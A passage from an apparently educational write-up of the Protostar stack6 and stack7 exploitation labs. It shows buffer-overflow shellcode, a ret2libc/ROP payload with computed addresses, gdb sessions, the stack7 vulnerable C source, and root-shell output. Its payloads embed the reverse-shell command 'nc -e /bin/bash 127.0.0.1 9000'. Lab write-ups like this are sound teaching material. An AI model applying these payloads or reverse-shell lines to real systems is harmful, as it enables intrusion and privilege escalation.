span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:/opt/protostar/bin$ /spanpython -c span class="s1"#39;print quot;Aquot;*80 + quot;\xa9\x85\x04\x08quot; + quot;\xe4\xf7\xff\xbfquot; + quot;\xeb\x37\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\x88\x43\x0c\x88\x43\x2b\xb0\x0b\x31\xd2\xb2\x09\x42\x89\x5b\x2c\x8d\x0c\x13\x89\x4b\x30\x8d\x4b\x0d\x89\x4b\x34\x31\xc9\x89\x4b\x38\x8d\x4b\x2c\x8d\x53\x34\xcd\x80\xe8\xc4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x2d\x63\x42\x6e\x63\x20\x2d\x65\x20\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x20\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x20\x39\x30\x30\x30\x43\x44\x44\x44\x44\x45\x45\x45\x45\x46\x46\x46\x46\x47\x47\x47\x47quot;#39;/span span class="p"|/span ./stack6/span
span class="code-line"span class="go"input path please: got path 1�̀��[�C    �C/span/span
span class="code-line"span class="go"                                                                                                                                  �C+�/span/span
span class="code-line"span class="go"                                                                                                                                      1ҲB�[,�/span/span
span class="code-line"span class="go"�K41ɉK8�K,�S4̀�����/bin/bashA-cBnc -e /bin/bash 127.0.0.1 9000CDDDDEEEEFFFFGGGG/span/span
span class="code-line"/code/pre/div
/td/tr/table
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span
span class="code-line"span class="normal" 2/span/span
span class="code-line"span class="normal" 3/span/span
span class="code-line"span class="normal" 4/span/span
span class="code-line"span class="normal" 5/span/span
span class="code-line"span class="normal" 6/span/span
span class="code-line"span class="normal" 7/span/span
span class="code-line"span class="normal" 8/span/span
span class="code-line"span class="normal" 9/span/span
span class="code-line"span class="normal"10/span/span
span class="code-line"span class="normal"11/span/span
span class="code-line"span class="normal"12/span/span
span class="code-line"span class="normal"13/span/span
span class="code-line"span class="normal"14/span/span
span class="code-line"span class="normal"15/span/span
span class="code-line"span class="normal"16/span/span
span class="code-line"span class="normal"17/span/span
span class="code-line"span class="normal"18/span/span
span class="code-line"span class="normal"19/span/span
span class="code-line"span class="normal"20/span/span
span class="code-line"span class="normal"21/span/span
span class="code-line"span class="normal"22/span/span
span class="code-line"span class="normal"23/span/span
span class="code-line"span class="normal"24/span/span
span class="code-line"span class="normal"25/span/span
span class="code-line"span class="normal"26/span/span
span class="code-line"span class="normal"27/span/span
span class="code-line"span class="normal"28/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"ls/span/span
span class="code-line"span class="go"final0/span/span
span class="code-line"span class="go"final1/span/span
span class="code-line"span class="go"final2/span/span
span class="code-line"span class="go"format0/span/span
span class="code-line"span class="go"format1/span/span
span class="code-line"span class="go"format2/span/span
span class="code-line"span class="go"format3/span/span
span class="code-line"span class="go"format4/span/span
span class="code-line"span class="go"heap0/span/span
span class="code-line"span class="go"heap1/span/span
span class="code-line"span class="go"heap2/span/span
span class="code-line"span class="go"heap3/span/span
span class="code-line"span class="go"net0/span/span
span class="code-line"span class="go"net1/span/span
span class="code-line"span class="go"net2/span/span
span class="code-line"span class="go"net3/span/span
span class="code-line"span class="go"net4/span/span
span class="code-line"span class="go"stack0/span/span
span class="code-line"span class="go"stack1/span/span
span class="code-line"span class="go"stack2/span/span
span class="code-line"span class="go"stack3/span/span
span class="code-line"span class="go"stack4/span/span
span class="code-line"span class="go"stack5/span/span
span class="code-line"span class="go"stack6/span/span
span class="code-line"span class="go"stack7/span/span
span class="code-line"span class="go"whoami/span/span
span class="code-line"span class="go"root/span/span
span class="code-line"/code/pre/div
/td/tr/table
pSo, we can still run our shellcode, we just have an extra step to bypass the check that is done on the return address./p
h2Stack6: Ret2Libc and ROP/h2
pHere we will recreate the exact same exploit for the same application but without using any shellcode./p
pFirst its easiest if we create what we want to run in C first:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span
span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="n"setuid/spanspan class="p"(/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span
span class="code-line"span class="n"execve/spanspan class="p"(/spanspan class="s"quot;/bin/bashquot;/spanspan class="p",/spanspan class="w" /spanspan class="p"{/spanspan class="w" /spanspan class="s"quot;/bin/bashquot;/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;-cquot;/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;nc -e /bin/bash 127.0.0.1 9000quot;/spanspan class="w" /spanspan class="p"},/spanspan class="w" /spanspan class="nb"NULL/spanspan class="p");/spanspan class="w"/span/span
span class="code-line"/code/pre/div
/td/tr/table
pSo we need to find the addresses of both codesetuid/code and codeexecve/code, we use codegdb/code for this:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span
span class="code-line"span class="normal" 2/span/span
span class="code-line"span class="normal" 3/span/span
span class="code-line"span class="normal" 4/span/span
span class="code-line"span class="normal" 5/span/span
span class="code-line"span class="normal" 6/span/span
span class="code-line"span class="normal" 7/span/span
span class="code-line"span class="normal" 8/span/span
span class="code-line"span class="normal" 9/span/span
span class="code-line"span class="normal"10/span/span
span class="code-line"span class="normal"11/span/span
span class="code-line"span class="normal"12/span/span
span class="code-line"span class="normal"13/span/span
span class="code-line"span class="normal"14/span/span
span class="code-line"span class="normal"15/span/span
span class="code-line"span class="normal"16/span/span
span class="code-line"span class="normal"17/span/span
span class="code-line"span class="normal"18/span/span
span class="code-line"span class="normal"19/span/span
span class="code-line"span class="normal"20/span/span
span class="code-line"span class="normal"21/span/span
span class="code-line"span class="normal"22/span/span
span class="code-line"span class="normal"23/span/span
span class="code-line"span class="normal"24/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:/opt/protostar/bin$ /spangdb -q ./stack6/span
span class="code-line"span class="go"Reading symbols from /opt/protostar/bin/stack6...done./span/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble main/span/span
span class="code-line"span class="go"Dump of assembler code for function main:/span/span
span class="code-line"span class="go"0x080484fa lt;main+0gt;:    push   %ebp/span/span
span class="code-line"span class="go"0x080484fb lt;main+1gt;:    mov    %esp,%ebp/span/span
span class="code-line"span class="go"0x080484fd lt;main+3gt;:    and    $0xfffffff0,%esp/span/span
span class="code-line"span class="go"0x08048500 lt;main+6gt;:    call   0x8048484 lt;getpathgt;/span/span
span class="code-line"span class="go"0x08048505 lt;main+11gt;:   mov    %ebp,%esp/span/span
span class="code-line"span class="go"0x08048507 lt;main+13gt;:   pop    %ebp/span/span
span class="code-line"span class="go"0x08048508 lt;main+14gt;:   ret    /span/span
span class="code-line"span class="go"End of assembler dump./span/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x080484fa/span/span
span class="code-line"span class="go"Breakpoint 1 at 0x80484fa: file stack6/stack6.c, line 26./span/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span
span class="code-line"span class="go"Starting program: /opt/protostar/bin/stack6 /span/span
span class="code-line"/span
span class="code-line"span class="go"Breakpoint 1, main (argc=1, argv=0xbffff864) at stack6/stack6.c:26/span/span
span class="code-line"span class="go"26  stack6/stack6.c: No such file or directory./span/span
span class="code-line"span class="go"    in stack6/stack6.c/span/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print setuid/span/span
span class="code-line"span class="gp"$/spanspan class="nv"1/span span class="o"=/span span class="o"{/spanlt;text variable, no debug infogt;span class="o"}/span 0xb7f2ec80 lt;__setuidgt;/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print execve/span/span
span class="code-line"span class="gp"$/spanspan class="nv"2/span span class="o"=/span span class="o"{/spanlt;text variable, no debug infogt;span class="o"}/span 0xb7f2e170 lt;__execvegt;/span
span class="code-line"/code/pre/div
/td/tr/table
pAs you can see, the address of setuid doesn't start with codebf/code so we can use this as our initial return address./p
pWe now want to address of our ROP gadget, this will just be responsible for cleaning up the stack after the call to setuid, so this time we want a codepop [register], ret/code sequence of instructions./p
pAgain we can use codeobjdump/code to find this, I won't post another dump of the binary but there are many of these sequencies we can use, I'll use the one at code0x80485a8/code./p
pWe can put our strings in to variables but this time, because we can insert null bytes (strong\0/strong), I will put the strings at the start of the payload./p
pThe number of bytes that the strings will occupy is:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span
span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:/opt/protostar/bin$ /spanspan class="nb"echo/span -n span class="s2"quot;/bin/bash -c nc -e /bin/bash 127.0.0.1 9000 quot;/span span class="p"|/span wc -c/span
span class="code-line"span class="go"44/span/span
span class="code-line"/code/pre/div
/td/tr/table
pWe know we have 80 bytes before we overwrite the return address, so we need code80-44 = 36/code bytes of padding after our strings./p
pSo here is how we want the stack to look after we overflow it:/p
pimg src="/assets/images/x86-32-linux/pseudo-stack.jpg" width="400"/p
pWe have all of these addresses except 11, 12, 14 and 15. Let's work these out now./p
pFirst 14 is just 10 bytes away from the start of our payload, and we already know the start of our payload is code0xbffff78c/code from the last exploit, so code0xbffff78c+0xa = 0xbffff796/code./p
p15 is just 3 bytes from 13 so code0xbffff796+0x3 = 0xbffff799/code./p
p11 is the start of our payload plus 80 bytes, then plus code8*4 = 32/code (there are 8 addresses before the argument list starts, each 4 bytes long), so code0xbffff78c+0x50+0x20 = 0xbffff7fc/code./p
p12 is just code3*4 = 12/code bytes away from 10 (because there are 3 4 byte addresses before the null pointer), so code0xbffff7fc+0xc = 0xbffff808/code./p
pSo with all of this information our stack should look like this:/p
pimg src="/assets/images/x86-32-linux/stack6-payload.jpg" width="400"/p
pObviously all of the addresses have to be put in in a href="https://en.wikipedia.org/wiki/Endianness#Little-endian" target="_blank"little endian/a format./p
pNow we can test this, first start our listener:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:~$ /spannc -l -p span class="m"9000/span/span
span class="code-line"/code/pre/div
/td/tr/table
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span
span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:/opt/protostar/bin$ /spanpython -c span class="s1"#39;print quot;/bin/bash\x00-c\x00nc -e /bin/bash 127.0.0.1 9000\x00quot; + quot;Aquot; * 36 + quot;\x80\xec\xf2\xb7quot; + quot;\xa8\x85\x04\x08quot; + quot;\x00\x00\x00\x00quot; + quot;\x70\xe1\xf2\xb7quot; + quot;JUNKquot; + quot;\x8c\xf7\xff\xbfquot; + quot;\xfc\xf7\xff\xbfquot; + quot;\x08\xf8\xff\xbfquot; + quot;\x8c\xf7\xff\xbfquot; + quot;\x96\xf7\xff\xbfquot; + quot;\x99\xf7\xff\xbfquot; + quot;\x00\x00\x00\x00quot;#39;/span span class="p"|/span ./stack6/span
span class="code-line"span class="go"input path please: got path /bin/bash/span/span
span class="code-line"/code/pre/div
/td/tr/table
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span
span class="code-line"span class="normal"2/span/span
span class="code-line"span class="normal"3/span/span
span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"pwd/span/span
span class="code-line"span class="go"/opt/protostar/bin/span/span
span class="code-line"span class="go"whoami/span/span
span class="code-line"span class="go"root/span/span
span class="code-line"/code/pre/div
/td/tr/table
pSolved!/p
h2Stack7: The App/h2
pThis challenge is very similar to the previous 1 except the return address is not allowed to begin with codeb/code instead of codebf/code:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span
span class="code-line"span class="normal" 2/span/span
span class="code-line"span class="normal" 3/span/span
span class="code-line"span class="normal" 4/span/span
span class="code-line"span class="normal" 5/span/span
span class="code-line"span class="normal" 6/span/span
span class="code-line"span class="normal" 7/span/span
span class="code-line"span class="normal" 8/span/span
span class="code-line"span class="normal" 9/span/span
span class="code-line"span class="normal"10/span/span
span class="code-line"span class="normal"11/span/span
span class="code-line"span class="normal"12/span/span
span class="code-line"span class="normal"13/span/span
span class="code-line"span class="normal"14/span/span
span class="code-line"span class="normal"15/span/span
span class="code-line"span class="normal"16/span/span
span class="code-line"span class="normal"17/span/span
span class="code-line"span class="normal"18/span/span
span class="code-line"span class="normal"19/span/span
span class="code-line"span class="normal"20/span/span
span class="code-line"span class="normal"21/span/span
span class="code-line"span class="normal"22/span/span
span class="code-line"span class="normal"23/span/span
span class="code-line"span class="normal"24/span/span
span class="code-line"span class="normal"25/span/span
span class="code-line"span class="normal"26/span/span
span class="code-line"span class="normal"27/span/span
span class="code-line"span class="normal"28/span/span
span class="code-line"span class="normal"29/span/span
span class="code-line"span class="normal"30/span/span
span class="code-line"span class="normal"31/span/span
span class="code-line"span class="normal"32/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span
span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;unistd.hgt;/spanspan class="cp"/span/span
span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span
span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span
span class="code-line"/span
span class="code-line"span class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="nf"getpath/spanspan class="p"()/spanspan class="w"/span/span
span class="code-line"span class="p"{/spanspan class="w"/span/span
span class="code-line"span class="w"  /spanspan class="kt"char/spanspan class="w" /spanspan class="n"buffer/spanspan class="p"[/spanspan class="mi"64/spanspan class="p"];/spanspan class="w"/span/span
span class="code-line"span class="w"  /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"ret/spanspan class="p";/spanspan class="w"/span/span
span class="code-line"/span
span class="code-line"span class="w"  /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;input path please: quot;/spanspan class="p");/spanspan class="w" /spanspan class="n"fflush/spanspan class="p"(/spanspan class="n"stdout/spanspan class="p");/spanspan class="w"/span/span
span class="code-line"/span
span class="code-line"span class="w"  /spanspan class="n"gets/spanspan class="p"(/spanspan class="n"buffer/spanspan class="p");/spanspan class="w"/span/span
span class="code-line"/span
span class="code-line"span class="w"  /spanspan class="n"ret/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"__builtin_return_address/spanspan class="p"(/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span
span class="code-line"/span
span class="code-line"span class="w"  /spanspan class="k"if/spanspan class="p"((/spanspan class="n"ret/spanspan class="w" /spanspan class="o"amp;/spanspan class="w" /spanspan class="mh"0xb0000000/spanspan class="p")/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mh"0xb0000000/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span
span class="code-line"span class="w"    /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;bzzzt (%p)/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"ret/spanspan class="p");/spanspan class="w"/span/span
span class="code-line"span class="w"    /spanspan class="n"_exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span
span class="code-line"span class="w"  /spanspan class="p"}/spanspan class="w"/span/span
span class="code-line"/span
span class="code-line"span class="w"  /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;got path %s/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"buffer/spanspan class="p");/spanspan class="w"/span/span
span class="code-line"span class="w"  /spanspan class="k"return/spanspan class="w" /spanspan class="n"strdup/spanspan class="p"(/spanspan class="n"buffer/spanspan class="p");/spanspan class="w"/span/span
span class="code-line"span class="p"}/spanspan class="w"/span/span
span class="code-line"/span
span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"argc/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"**/spanspan class="n"argv/spanspan class="p")/spanspan class="w"/span/span
span class="code-line"span class="p"{/spanspan class="w"/span/span
span class="code-line"span class="w"  /spanspan class="n"getpath/spanspan class="p"();/spanspan class="w"/span/span
span class="code-line"/span
span class="code-line"/span
span class="code-line"/span
span class="code-line"span class="p"}/spanspan class="w"/span/span
span class="code-line"/code/pre/div
/td/tr/table
h2Stack7: Exploitation/h2
pWe could use exactly the same method as the last 1 and just put a pointer to a coderet/code instruction before the call to codesetuid/code but I want to show a different way to do it./p
pI'm going to use codesystem/code instead of codeexecve/code and put my string into an environment variable./p
pFirst let's find the addresses of codesetuid/code and codesystem/code:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span
span class="code-line"span class="normal" 2/span/span
span class="code-line"span class="normal" 3/span/span
span class="code-line"span class="normal" 4/span/span
span class="code-line"span class="normal" 5/span/span
span class="code-line"span class="normal" 6/span/span
span class="code-line"span class="normal" 7/span/span
span class="code-line"span class="normal" 8/span/span
span class="code-line"span class="normal" 9/span/span
span class="code-line"span class="normal"10/span/span
span class="code-line"span class="normal"11/span/span
span class="code-line"span class="normal"12/span/span
span class="code-line"span class="normal"13/span/span
span class="code-line"span class="normal"14/span/span
span class="code-line"span class="normal"15/span/span
span class="code-line"span class="normal"16/span/span
span class="code-line"span class="normal"17/span/span
span class="code-line"span class="normal"18/span/span
span class="code-line"span class="normal"19/span/span
span class="code-line"span class="normal"20/span/span
span class="code-line"span class="normal"21/span/span
span class="code-line"span class="normal"22/span/span
span class="code-line"span class="normal"23/span/span
span class="code-line"span class="normal"24/span/span
span class="code-line"span class="normal"25/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:/opt/protostar/bin$ /spangdb -q ./stack7/span
span class="code-line"span class="go"Reading symbols from /opt/protostar/bin/stack7...done./span/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"set disassembly-flavor intel/span/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble main/span/span
span class="code-line"span class="go"Dump of assembler code for function main:/span/span
span class="code-line"span class="go"0x08048545 lt;main+0gt;:    push   ebp/span/span
span class="code-line"span class="go"0x08048546 lt;main+1gt;:    mov    ebp,esp/span/span
span class="code-line"span class="go"0x08048548 lt;main+3gt;:    and    esp,0xfffffff0/span/span
span class="code-line"span class="go"0x0804854b lt;main+6gt;:    call   0x80484c4 lt;getpathgt;/span/span
span class="code-line"span class="go"0x08048550 lt;main+11gt;:   mov    esp,ebp/span/span
span class="code-line"span class="go"0x08048552 lt;main+13gt;:   pop    ebp/span/span
span class="code-line"span class="go"0x08048553 lt;main+14gt;:   ret    /span/span
span class="code-line"span class="go"End of assembler dump./span/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x08048545/span/span
span class="code-line"span class="go"Breakpoint 1 at 0x8048545: file stack7/stack7.c, line 27./span/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span
span class="code-line"span class="go"Starting program: /opt/protostar/bin/stack7 /span/span
span class="code-line"/span
span class="code-line"span class="go"Breakpoint 1, main (argc=1, argv=0xbffff864) at stack7/stack7.c:27/span/span
span class="code-line"span class="go"27  stack7/stack7.c: No such file or directory./span/span
span class="code-line"span class="go"    in stack7/stack7.c/span/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print setuid/span/span
span class="code-line"span class="gp"$/spanspan class="nv"1/span span class="o"=/span span class="o"{/spanlt;text variable, no debug infogt;span class="o"}/span 0xb7f2ec80 lt;__setuidgt;/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print system/span/span
span class="code-line"span class="gp"$/spanspan class="nv"2/span span class="o"=/span span class="o"{/spanlt;text variable, no debug infogt;span class="o"}/span 0xb7ecffb0 lt;__libc_systemgt;/span
span class="code-line"/code/pre/div
/td/tr/table
pNow we need to find the addresses of our ROP gadgets, the first being just a coderet/code instruction and the second being a codepop [register], ret/code sequence to remove the argument to codesetuid/code before running codesystem/code, although these gadgets will be 1 byte away from each other:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"  1/span/span
span class="code-line"span class="normal"  2/span/span
span class="code-line"span class="normal"  3/span/span
span class="code-line"span class="normal"  4/span/span
span class="code-line"span class="normal"  5/span/span
span class="code-line"span class="normal"  6/span/span
span class="code-line"span class="normal"  7/span/span
span class="code-line"span class="normal"  8/span/span
span class="code-line"span class="normal"  9/span/span
span class="code-line"span class="normal" 10/span/span
span class="code-line"span class="normal" 11/span/span
span class="code-line"span class="normal" 12/span/span
span class="code-line"span class="normal" 13/span/span
span class="code-line"span class="normal" 14/span/span
span class="code-line"span class="normal" 15/span/span
span class="code-line"span class="normal" 16/span/span
span class="code-line"span class="normal" 17/span/span
span class="code-line"span class="normal" 18/span/span
span class="code-line"span class="normal" 19/span/span
span class="code-line"span class="normal" 20/span/span
span class="code-line"span class="normal" 21/span/span
span class="code-line"span class="normal" 22/span/span
span class="code-line"span class="normal" 23/span/span
span class="code-line"span class="normal" 24/span/span
span class="code-line"span class="normal" 25/span/span
span class="code-line"span class="normal" 26/span/span
span class="code-line"span class="normal" 27/span/span
span class="code-line"span class="normal" 28/span/span
span class="code-line"span class="normal" 29/span/span
span class="code-line"span class="normal" 30/span/span
span class="code-line"span class="normal" 31/span/span
span class="code-line"span class="normal" 32/span/span
span class="code-line"span class="normal" 33/span/span
span class="code-line"span class="normal" 34/span/span
span class="code-line"span class="normal" 35/span/span
span class="code-line"span class="normal" 36/span/span
span class="code-line"span class="normal" 37/span/span
span class="code-line"span class="normal" 38/span/span
span class="code-line"span class="normal" 39/span/span
span class="code-line"span class="normal" 40/span/span
span class="code-line"span class="normal" 41/span/span
span class="code-line"span class="normal" 42/span/span
span class="code-line"span class="normal" 43/span/span
span class="code-line"span class="normal" 44/span/span
span class="code-line"span class="normal" 45/span/span
span class="code-line"span class="normal" 46/span/span
span class="code-line"span class="normal" 47/span/span
span class="code-line"span class="normal" 48/span/span
span class="code-line"span class="normal" 49/span/span
span class="code-line"span class="normal" 50/span/span
span class="code-line"span class="normal" 51/span/span
span class="code-line"span class="normal" 52/span/span
span class="code-line"span class="normal" 53/span/span
span class="code-line"span class="normal" 54/span/span
span class="code-line"span class="normal" 55/span/span
span class="code-line"span class="normal" 56/span/span
span class="code-line"span class="normal" 57/span/span
span class="code-line"span class="normal" 58/span/span
span class="code-line"span class="normal" 59/span/span
span class="code-line"span class="normal" 60/span/span
span class="code-line"span class="normal" 61/span/span
span class="code-line"span class="normal" 62/span/span
span class="code-line"span class="normal" 63/span/span
span class="code-line"span class="normal" 64/span/span
span class="code-line"span class="normal" 65/span/span
span class="code-line"span class="normal" 66/span/span
span class="code-line"span class="normal" 67/span/span
span class="code-line"span class="normal" 68/span/span
span class="code-line"span class="normal" 69/span/span
span class="code-line"span class="normal" 70/span/span
span class="code-line"span class="normal" 71/span/span
span class="code-line"span class="normal" 72/span/span
span class="code-line"span class="normal" 73/span/span
span class="code-line"span class="normal" 74/span/span
span class="code-line"span class="normal" 75/span/span
span class="code-line"span class="normal" 76/span/span
span class="code-line"span class="normal" 77/span/span
span class="code-line"span class="normal" 78/span/span
span class="code-line"span class="normal" 79/span/span
span class="code-line"span class="normal" 80/span/span
span class="code-line"span class="normal" 81/span/span
span class="code-line"span class="normal" 82/span/span
span class="code-line"span class="normal" 83/span/span
span class="code-line"span class="normal" 84/span/span
span class="code-line"span class="normal" 85/span/span
span class="code-line"span class="normal" 86/span/span
span class="code-line"span class="normal" 87/span/span
span class="code-line"span class="normal" 88/span/span
span class="code-line"span class="normal" 89/span/span
span class="code-line"span class="normal" 90/span/span
span class="code-line"span class="normal" 91/span/span
span class="code-line"span class="normal" 92/span/span
span class="code-line"span class="normal" 93/span/span
span class="code-line"span class="normal" 94/span/span
span class="code-line"span class="normal" 95/span/span
span class="code-line"span class="normal" 96/span/span
span class="code-line"span class="normal" 97/span/span
span class="code-line"span class="normal" 98/span/span
span class="code-line"span class="normal" 99/span/span
span class="code-line"span class="normal"100/span/span
span class="code-line"span class="normal"101/span/span
span class="code-line"span class="normal"102/span/span
span class="code-line"span class="normal"103/span/span
span class="code-line"span class="normal"104/span/span
span class="code-line"span class="normal"105/span/span
span class="code-line"span class="normal"106/span/span
span class="code-line"span class="normal"107/span/span
span class="code-line"span class="normal"108/span/span
span class="code-line"span class="normal"109/span/span
span class="code-line"span class="normal"110/span/span
span class="code-line"span class="normal"111/span/span
span class="code-line"span class="normal"112/span/span
span class="code-line"span class="normal"113/span/span
span class="code-line"span class="normal"114/span/span
span class="code-line"span class="normal"115/span/span
span class="code-line"span class="normal"116/span/span
span class="code-line"span class="normal"117/span/span
span class="code-line"span class="normal"118/span/span
span class="code-line"span class="normal"119/span/span
span class="code-line"span class="normal"120/span/span
span class="code-line"span class="normal"121/span/span
span class="code-line"span class="normal"122/span/span
span class="code-line"span class="normal"123/span/span
span class="code-line"span class="normal"124/span/span
span class="code-line"span class="normal"125/span/span
span class="code-line"span class="normal"126/span/span
span class="code-line"span class="normal"127/span/span
span class="code-line"span class="normal"128/span/span
span class="code-line"span class="normal"129/span/span
span class="code-line"span class="normal"130/span/span
span class="code-line"span class="normal"131/span/span
span class="code-line"span class="normal"132/span/span
span class="code-line"span class="normal"133/span/span
span class="code-line"span class="normal"134/span/span
span class="code-line"span class="normal"135/span/span
span class="code-line"span class="normal"136/span/span
span class="code-line"span class="normal"137/span/span
span class="code-line"span class="normal"138/span/span
span class="code-line"span class="normal"139/span/span
span class="code-line"span class="normal"140/span/span
span class="code-line"span class="normal"141/span/span
span class="code-line"span class="normal"142/span/span
span class="code-line"span class="normal"143/span/span
span class="code-line"span class="normal"144/span/span
span class="code-line"span class="normal"145/span/span
span class="code-line"span class="normal"146/span/span
span class="code-line"span class="normal"147/span/span
span class="code-line"span class="normal"148/span/span
span class="code-line"span class="normal"149/span/span
span class="code-line"span class="normal"150/span/span
span class="code-line"span class="normal"151/span/span
span class="code-line"span class="normal"152/span/span
span class="code-line"span class="normal"153/span/span
span class="code-line"span class="normal"154/span/span
span class="code-line"span class="normal"155/span/span
span class="code-line"span class="normal"156/span/span
span class="code-line"span class="normal"157/span/span
span class="code-line"span class="normal"158/span/span
span class="code-line"span class="normal"159/span/span
span class="code-line"span class="normal"160/span/span
span class="code-line"span class="normal"161/span/span
span class="code-line"span class="normal"162/span/span
span class="code-line"span class="normal"163/span/span
span class="code-line"span class="normal"164/span/span
span class="code-line"span class="normal"165/span/span
span class="code-line"span class="normal"166/span/span
span class="code-line"span class="normal"167/span/span
span class="code-line"span class="normal"168/span/span
span class="code-line"span class="normal"169/span/span
span class="code-line"span class="normal"170/span/span
span class="code-line"span class="normal"171/span/span
span class="code-line"span class="normal"172/span/span
span class="code-line"span class="normal"173/span/span
span class="code-line"span class="normal"174/span/span
span class="code-line"span class="normal"175/span/span
span class="code-line"span class="normal"176/span/span
span class="code-line"span class="normal"177/span/span
span class="code-line"span class="normal"178/span/span
span class="code-line"span class="normal"179/span/span
span class="code-line"span class="normal"180/span/span
span class="code-line"span class="normal"181/span/span
span class="code-line"span class="normal"182/span/span
span class="code-line"span class="normal"183/span/span
span class="code-line"span class="normal"184/span/span
span class="code-line"span class="normal"185/span/span
span class="code-line"span class="normal"186/span/span
span class="code-line"span class="normal"187/span/span
span class="code-line"span class="normal"188/span/span
span class="code-line"span class="normal"189/span/span
span class="code-line"span class="normal"190/span/span
span class="code-line"span class="normal"191/span/span
span class="code-line"span class="normal"192/span/span
span class="code-line"span class="normal"193/span/span
span class="code-line"span class="normal"194/span/span
span class="code-line"span class="normal"195/span/span
span class="code-line"span class="normal"196/span/span
span class="code-line"span class="normal"197/span/span
span class="code-line"span class="normal"198/span/span
span class="code-line"span class="normal"199/span/span
span class="code-line"span class="normal"200/span/span
span class="code-line"span class="normal"201/span/span
span class="code-line"span class="normal"202/span/span
span class="code-line"span class="normal"203/span/span
span class="code-line"span class="normal"204/span/span
span class="code-line"span class="normal"205/span/span
span class="code-line"span class="normal"206/span/span
span class="code-line"span class="normal"207/span/span
span class="code-line"span class="normal"208/span/span
span class="code-line"span class="normal"209/span/span
span class="code-line"span class="normal"210/span/span
span class="code-line"span class="normal"211/span/span
span class="code-line"span class="normal"212/span/span
span class="code-line"span class="normal"213/span/span
span class="code-line"span class="normal"214/span/span
span class="code-line"span class="normal"215/span/span
span class="code-line"span class="normal"216/span/span
span class="code-line"span class="normal"217/span/span
span class="code-line"span class="normal"218/span/span
span class="code-line"span class="normal"219/span/span
span class="code-line"span class="normal"220/span/span
span class="code-line"span class="normal"221/span/span
span class="code-line"span class="normal"222/span/span
span class="code-line"span class="normal"223/span/span
span class="code-line"span class="normal"224/span/span
span class="code-line"span class="normal"225/span/span
